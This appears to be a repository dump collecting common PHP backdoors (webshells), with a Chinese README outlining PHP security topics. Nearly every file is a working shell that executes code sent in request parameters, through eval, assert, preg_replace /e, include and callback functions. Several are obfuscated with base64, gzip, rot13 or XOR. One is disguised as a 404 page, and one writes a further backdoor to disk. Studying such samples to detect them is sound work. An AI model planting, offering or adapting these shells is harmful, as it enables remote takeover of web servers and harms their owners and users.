├── .gitignore
├── 404_not_found.php
├── README.md
├── array_filter.php
├── array_map.php
├── assert.php
├── call_user_func.php
├── eval.php
├── gzinflate.php
├── gzuncompress.php
├── include.php
├── mysql_str_rot13.php
├── preg_replace.php
├── request.php
├── str_replace.php
├── str_rot13.php
├── uasort.php
└── xor.php


/.gitignore:
--------------------------------------------------------------------------------
1 | /demo_test.php
2 | /.buildpath
3 | /*.project
4 | /.settings
5 | 


--------------------------------------------------------------------------------
/404_not_found.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 2 | <html><head>
 3 | <title>404 Not Found</title>
 4 | </head><body>
 5 | <h1>Not Found</h1>
 6 | <p>The requested URL was not found on this server.</p>
 7 | </body></html>
 8 | <?php
 9 | @preg_replace("/[pageerror]/e",$_POST['error'],"saft");
10 | header('HTTP/1.1 404 Not Found');
11 | ?> 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 常见PHP后门程序代码(安全很重要！！！)  
 2 | 
 3 | ## PHP安全指南 
 4 | PHP诞生很久，可选版本较多，且不是强类型变量语言，易于编写同样漏洞较多,下面给出PHP安全编程的指南：
 5 | 
 6 | ### 配置安全 
 7 | 1. 报错信息 error_reporting   
 8 | 2. 错误日志 error_log  
 9 | 3. 注册全局 register_globals  
10 | 4. 远程文件包含  
11 | 4. 安全模式  
12 | 5. EXPOSE_OFF  
13 | 
14 | ### 数据安全  
15 | 1. 数据过滤   
16 | 2. 数据清洗   
17 | 3. 数据验证   
18 | 4. 密码安全   
19 | 
20 | ### 编程安全  
21 | 1. 处理文件上传   
22 | 2. SQL注入   
23 | 3. XSS  
24 | 4. CSRF 
25 | 5. COOKIE安全  


--------------------------------------------------------------------------------
/array_filter.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $e = $_REQUEST['e'];
3 | $arr = array($_POST['pass'],);
4 | array_filter($arr, base64_decode($e));
5 | ?>


--------------------------------------------------------------------------------
/array_map.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $e = $_REQUEST['e'];
3 | $arr = array($_POST['pass'],);
4 | array_map(base64_decode($e), $arr);
5 | ?>


--------------------------------------------------------------------------------
/assert.php:
--------------------------------------------------------------------------------
1 | <?php
2 | //assert执行传过来的字符串，断言失败时，设置了assert_options(ASSERT_CALLBACK, 'my_assert_handler');，调用自定义函数
3 | assert($_GET['c']);
4 | ?>


--------------------------------------------------------------------------------
/call_user_func.php:
--------------------------------------------------------------------------------
1 | <?php
2 | call_user_func('assert',$_POST[cmd]);
3 | call_user_func_array('assert', array($_REQUEST['pass']));
4 | ?>


--------------------------------------------------------------------------------
/eval.php:
--------------------------------------------------------------------------------
1 | <?php
2 | # eval($php_code);//无法禁用eval, 是zend的结构体
3 | fputs(fopen('houmen_wr.php','w'),'<?php eval($_GET[cc])?>'); 
4 | eval (base64_decode($_POST["php"]));  
5 | ?>


--------------------------------------------------------------------------------
/gzinflate.php:
--------------------------------------------------------------------------------
1 | <?php
2 | eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
3 | ?>


--------------------------------------------------------------------------------
/gzuncompress.php:
--------------------------------------------------------------------------------
1 | <?php
2 | eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')))
3 | ?>


--------------------------------------------------------------------------------
/include.php:
--------------------------------------------------------------------------------
1 | <?@include($_POST["code"]);?> 
2 | <?@include($_POST["code"]);?>


--------------------------------------------------------------------------------
/mysql_str_rot13.php:
--------------------------------------------------------------------------------
1 | <?php
2 | if(($db = @new PDO('sqlite::memory:')) && ($sql = strrev('TSOP_')) && ($sql = $$sql)) {
3 | 	$stmt = @$db->query("SELECT '{$sql[b4dboy]}'");
4 | 	$result = @$stmt->fetchAll(PDO::FETCH_FUNC, str_rot13('nffreg'));
5 | }
6 | ?>


--------------------------------------------------------------------------------
/preg_replace.php:
--------------------------------------------------------------------------------
1 | <?php
2 | echo $_GET['h'];
3 | echo preg_replace("/test/e", $_GET["h"], "jutst test"); 
4 | preg_replace("/(.*)/ies", $decode_code, null);
5 | ?>


--------------------------------------------------------------------------------
/request.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $_REQUEST['a']($_REQUEST['b']);
3 | ?>


--------------------------------------------------------------------------------
/str_replace.php:
--------------------------------------------------------------------------------
1 | <?php 
2 | $a = str_replace(x,"","axsxxsxexrxxt");
3 | $a($_POST["c"]); 
4 | ?>


--------------------------------------------------------------------------------
/str_rot13.php:
--------------------------------------------------------------------------------
1 | <?php
2 | eval(str_rot13('riny($_CBFG[pzq]);'));
3 | ?>


--------------------------------------------------------------------------------
/uasort.php:
--------------------------------------------------------------------------------
1 | <?php
2 | $e = $_REQUEST['e'];
3 | $arr = array('test', $_REQUEST['pass']);
4 | uasort($arr, base64_decode($e));
5 | ?>


--------------------------------------------------------------------------------
/xor.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | //两个变量进行异或时，会将字符串转换成二进制再进行异或，异或完，又将结果从二进制转换成了字符串
 3 | //异或在非字母数字的PHP后门中经常使用并且非常重要（因该就是用符号转换成字母）
 4 | 
 5 |     @$_++; // $_ = 1
 6 |     $__=("#"^"|"); // $__ = _
 7 |     $__.=("."^"~"); // _P
 8 |     $__.=("/"^"`"); // _PO
 9 |     $__.=("|"^"/"); // _POS
10 |     $__.=("{"^"/"); // _POST 
11 |     ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
12 | ?>


--------------------------------------------------------------------------------